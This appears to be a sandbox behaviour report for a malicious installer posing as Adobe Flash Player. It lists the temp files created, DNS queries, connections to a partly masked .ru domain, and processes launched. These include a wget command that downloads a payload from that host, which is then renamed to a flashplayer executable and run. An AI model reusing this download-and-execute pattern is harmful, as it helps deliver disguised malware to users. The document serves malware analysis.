Technical Information
- '' (downloaded from the Internet)
- %TEMP%\$inst\2.tmp
- %TEMP%\$inst\temp_0.tmp
- %TEMP%\wget.exe
- %TEMP%\wchm3.bat
- %TEMP%\999453485.dat
- %TEMP%\$inst\temp_0.tmp
- %TEMP%\$inst\2.tmp
- from %TEMP%\999453485.dat to %TEMP%\flashplayer30_nt_base-x86.exe
- 'localhost':1037
- 'get.adobe.com':80
- 'tv###rotein.ru':80
- http://get.adobe.com/flashplayer
- http://tv###rotein.ru/data/999453485.dat
- DNS ASK get.adobe.com
- DNS ASK tv###rotein.ru
- ClassName: '' WindowName: ''
- ClassName: 'IEFrame' WindowName: ''
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebcheckMonitor' WindowName: ''
- '%TEMP%\wget.exe' "http://tv###rotein.ru/data/999453485.dat"
- '%TEMP%\flashplayer30_nt_base-x86.exe'
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\wchm3.bat" "
- '%ProgramFiles%\Internet Explorer\IEXPLORE.EXE' -nohome